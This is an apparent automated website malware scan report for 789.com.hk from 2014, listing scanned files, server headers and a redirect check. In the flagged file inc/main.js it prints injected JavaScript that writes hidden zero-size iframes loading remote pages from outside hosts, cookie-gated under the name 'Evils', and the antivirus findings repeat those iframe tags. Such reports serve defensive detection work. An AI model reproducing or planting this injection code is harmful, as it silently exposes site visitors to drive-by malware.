Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=789.com.hk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://789.com.hk/ | 200 OK Content-Length: 42723 Content-Type: text/html | clean |
http://789.com.hk/skin/simple/Prototype.js | 200 OK Content-Length: 14405 Content-Type: application/x-javascript | clean |
http://789.com.hk/inc/main.js | 200 OK Content-Length: 5340 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JugeComment(myform) { if (document.myform.UserName.value==""){ alert ("ÄãµÄÓû§Ãû²»¿ÉΪ¿Õ£¡"); document.myform.UserName.focus(); return(false); } if (document.myform.content.value == "") { alert("ÆÀÂÛÄÚÈݲ»ÄÜΪ¿Õ£¡"); document.myform.content.focus(); return (false); } } function CheckAll(form) { for (var i=0;i<form.elements.length;i++) { var e = form.ele } else { document.write('<iframe src=http://98.129.194.210/CFIDE/debug/includes/java.html width=0 height=0></iframe>'); document.write('<iframe src=http://newsite.acmetoy.com/m/d/javapdf.html width=0 height=0></iframe>'); } } if(getCookie('Evils') == ''){doWrite();setCookie('Evils', 'Somethingbbbbb');} Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://newsite.acmetoy.com/m/d/javapdf.html <iframe src=http://newsite.acmetoy.com/m/d/javapdf.html width=0 height=0> Hidden iFrame found. size: 0x0 src: http://newsite.acmetoy.com/m/d/pdf.html <iframe src=http://newsite.acmetoy.com/m/d/pdf.html width=0 height=0> Hidden iFrame found. size: 0x0 src: http://98.129.194.210/cfide/debug/includes/java.html <iframe src=http://98.129.194.210/cfide/debug/includes/java.html width=0 height=0> | ||
http://789.com.hk/images/js/Std_StranJF.Js | 200 OK Content-Length: 8811 Content-Type: application/x-javascript | clean |
http://789.com.hk/adfile/banner.js | 200 OK Content-Length: 182 Content-Type: application/x-javascript | clean |
http://789.com.hk/pic/ | 200 OK Content-Length: 42064 Content-Type: text/html | clean |
http://789.com.hk/count.asp+++++ | 404 Not Found Content-Length: 1379 Content-Type: text/html | clean |
http://789.com.hk/test404page.js | 404 Not Found Content-Length: 1379 Content-Type: text/html | clean |
http://789.com.hk/news/ | 200 OK Content-Length: 20948 Content-Type: text/html | clean |
http://789.com.hk/adfile/tuijian.js | 200 OK Content-Length: 168 Content-Type: application/x-javascript | clean |
http://789.com.hk/GuestBook/ | 200 OK Content-Length: 43294 Content-Type: text/html | clean |
http://789.com.hk/GuestBook/showpage.js | 200 OK Content-Length: 3064 Content-Type: application/x-javascript | clean |
http://789.com.hk/user/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 19 Dec 2014 03:32:40 GMT Location: ./login.asp Server: Microsoft-IIS/6.0 Content-Length: 132 Content-Type: text/html Set-Cookie: ASPSESSIONIDAADBSRBS=CFBPGHMBNNIAIEFLNICBNMBM; path=/ X-Powered-By: ASP.NET | clean |
http://789.com.hk/user/./login.asp | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
http://789.com.hk/user/./ | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 19 Dec 2014 03:32:43 GMT Location: ./login.asp Server: Microsoft-IIS/6.0 Content-Length: 132 Content-Type: text/html Set-Cookie: ASPSESSIONIDAADBSRBS=EFBPGHMBDJGIDDBHLPEOGFJN; path=/ X-Powered-By: ASP.NET | clean |
http://789.com.hk/user/././login.asp | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
http://789.com.hk/user/././ | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 19 Dec 2014 03:32:45 GMT Location: ./login.asp Server: Microsoft-IIS/6.0 Content-Length: 132 Content-Type: text/html Set-Cookie: ASPSESSIONIDAADBSRBS=GFBPGHMBIODMDHIILOJELODM; path=/ X-Powered-By: ASP.NET | clean |
http://789.com.hk/user/./././login.asp | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 789.com.hk
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 19 Dec 2014 03:32:14 GMT
Server: Microsoft-IIS/6.0
Content-Length: 44421
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADBSRBS=NEBPGHMBOPBPLGDGCILODONC; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...44421 bytes of data.
GET / HTTP/1.1
Host: 789.com.hk
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 19 Dec 2014 03:32:14 GMT
Server: Microsoft-IIS/6.0
Content-Length: 44421
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADBSRBS=NEBPGHMBOPBPLGDGCILODONC; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...44421 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 789.com.hk
Referer: http://www.google.com/search?q=789.com.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 789.com.hk
Referer: http://www.google.com/search?q=789.com.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.